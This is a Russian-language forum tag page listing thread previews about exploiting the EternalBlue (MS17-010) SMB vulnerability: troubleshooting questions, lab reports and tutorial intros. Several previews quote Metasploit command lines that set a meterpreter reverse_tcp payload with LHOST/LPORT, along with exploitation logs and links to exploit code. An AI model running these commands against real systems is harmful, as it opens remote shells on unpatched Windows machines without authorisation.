• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

eternalblue

  1. M

    Проблема Не получается реализовать Eternalblue(ms17_010) из Linux.

    Здравствуйте, пользователи форума. Пытаюсь провести атаку Eternalblue с моего VDS. Буду краток. sudo ./msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/meterpreter/reverse_tcp(пробовал с windows/x64/meterpreter/reverce_tcp) set LPORT 7775 set LHOST *public dns* set...
  2. D

    Проблема Не работает Eternalblue

    Что ввожу до запуска: -msfconsole -use exploit/windows/smb/ms17_010_eternalblue -set rhost ******** -exploit Окно после запуска: - Connecting to target for exploitation. [+] - Connection established for exploitation. [+] - Target OS selected valid for OS indicated by SMB reply - CORE raw...
  3. Tayrus

    Статья CVE-2017-0144 |MS17-010

    Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем. Качаем это: https://www.exploit-db.com/exploits/42315/ и это : https://github.com/worawit/MS17-010/blob/master/mysmb.py и вот это: https://github.com/trustedsec/unicorn Кидаем все в одну папку и создаем файл: touch...
  4. M

    Проблема EternalBlue - эксплотирование Windows 8.1, Windows Server 2012 (не R2)

    Доброго времени суток, EternalBlue заезжнная тема, но в инете не так много информации об этой уязвимости и Windows 8.1, Windows Server 2012 (не R2). Речь пойдет именно о данном эксплойте worawit/MS17-010 , он содержит подробную инструкцию об использовании, но если все делать по ней то: Windows 7...
  5. M

    Проблема Аудит Windows 7 x32, Windows Server 2012

    Доброго времени суток, для начала хотелось бы сказать, что я еще ламер. Имеются системы Wndows 7 x32 6.1.7601, Windows Server 2012 x64 6.2.9200 (не R2), они полностью чистые никаких сервисов на них нет, нужно провести их "аудит". Я бы хотел попросить совета, какие эксплоит на них зайдут...
  6. Xyrox

    EternalBlue на Termux

    Во-первых, что такое Termux. Termux - это терминал с множеством пакетов, как тот же самый git или nmap. В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга. Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать...
  7. Lisenok

    Проблема MSF сессия

    Доброго времени уважаемые! Произвожу атаку посредством eternalblue на компьютер под управлением windows 7 64bit , атака производится с kali linux, в локальной сети, так вот вопрос в том что до этого просто проверял эксплоит и все работало, то есть после атаки открывалась cmd на на win7, теперь...
  8. Tayrus

    Проблема eternalblue синий экран

    У меня есть виртуалка на ней стоит win7 profes x86 без обновлений и антивиря Запускаю в метасплоите eternalblue Started reverse TCP handler on 192.168.1.4:4444 192.168.1.7:445 - Connecting to target for exploitation. [+] 192.168.1.7:445 - Connection established for exploitation. [+]...
  9. Vander

    Статья Eternal Scanner - Интернет сканер для эксплойтов CVE-2017-0144

    Всем привет! В этой статье я хочу продемонстрировать работу сканера, который способен отыскать в сети уязвимые для EternalBlue ( CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, хосты. Итак, собственно – Eternal Scanner...
  10. Vander

    Статья EternalBlue - Эксплуатация Windows PC

    Привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные...
  11. Dmitry88

    Статья PowerShell Empire (часть 2) Fuzzbunch

    В предыдущей статье (Часть 1) , мы ознакомились с Powershell Empire и вектором атаки через уязвимость браузера IE 9-11. В этой статье мы ознакомимся с вектором атаки с использованием уязвимости MS17-010. 2. Вектор атаки Fuzzbunch (MS17-010) Второй вектор атаки будет сложнее. Мы будем...
  12. ghostphisher

    Статья Eternalblue & Doublepulsar Exploit in Metasploit Win 7 Hack

    Всем хорошего. Наверное все уже начитались про слитые с ресурсов АНБ кучу разных утилит, уязвимостей и т.д. Eternalblue & Doublepulsar Exploit одна из них, и как не странно, все еще актуальность имеет. Хотя почему странно, если у нас люди сидят по 3-4 года на Win 7 не обновлясь ( у некоторых...
Вверх Снизу